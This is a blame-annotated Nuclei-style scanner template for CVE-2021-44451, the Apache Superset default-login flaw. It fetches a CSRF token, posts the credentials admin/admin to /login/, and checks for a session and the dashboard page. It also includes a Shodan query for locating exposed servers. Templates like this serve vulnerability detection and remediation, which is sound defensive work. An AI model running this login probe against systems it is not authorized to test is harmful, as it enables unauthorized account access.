2022-03-02 16:54:14 +00:00
id : CVE-2021-44451
2021-07-21 05:21:27 +00:00
info :
2023-01-16 17:41:15 +00:00
name : Apache Superset <=1.3.2 - Default Login
2021-07-21 05:21:27 +00:00
author : dhiyaneshDK
2022-05-17 09:18:12 +00:00
severity : medium
2022-11-14 13:39:06 +00:00
description : |
2023-01-16 17:41:15 +00:00
Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation : Upgrade to Apache Superset 1.4.0 or higher.
2022-03-02 16:54:14 +00:00
reference :
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
2022-05-17 09:18:12 +00:00
- https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
2022-11-14 13:39:06 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-44451
2022-03-02 16:54:14 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score : 6.5
2022-03-02 16:54:14 +00:00
cve-id : CVE-2021-44451
2022-06-16 04:35:56 +00:00
cwe-id : CWE-522
2022-05-12 14:18:36 +00:00
metadata :
2022-05-17 09:18:12 +00:00
verified : true
2022-06-16 04:23:42 +00:00
shodan-query : http.favicon.hash:1582430156
2022-04-22 16:43:51 +00:00
tags : cve,cve2021,apache,superset,default-login
2021-07-21 05:21:27 +00:00
requests :
2021-07-23 21:19:55 +00:00
- raw :
- |
GET /login/ HTTP/1.1
Host : {{Hostname}}
2021-07-23 19:33:06 +00:00
2021-07-23 21:19:55 +00:00
- |
POST /login/ HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2021-10-10 01:40:47 +00:00
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
2021-10-08 16:42:54 +00:00
2022-11-14 13:39:06 +00:00
- |
GET /dashboard/list/ HTTP/1.1
Host : {{Hostname}}
2021-10-10 01:40:47 +00:00
attack : pitchfork
2021-10-08 16:42:54 +00:00
payloads :
username :
- admin
password :
- admin
2021-07-23 21:19:55 +00:00
2022-11-14 13:39:06 +00:00
req-condition : true
cookie-reuse : true
2021-07-21 05:21:27 +00:00
matchers-condition : and
matchers :
2021-07-23 21:19:55 +00:00
- type : word
2022-11-14 13:39:06 +00:00
part : header_2
2021-07-23 21:19:55 +00:00
words :
- 'session'
2021-07-21 05:21:27 +00:00
2022-11-14 13:39:06 +00:00
- type : word
part : body_3
words :
- 'DashboardFilterStateRestApi'
2022-03-02 16:54:14 +00:00
2022-11-14 13:39:06 +00:00
extractors :
- type : regex
name : csrf_token
group : 1
part : body
regex :
- 'name="csrf_token" type="hidden" value="(.*)"'
internal : true
2023-01-16 17:41:15 +00:00
# Enhanced by md on 2023/01/06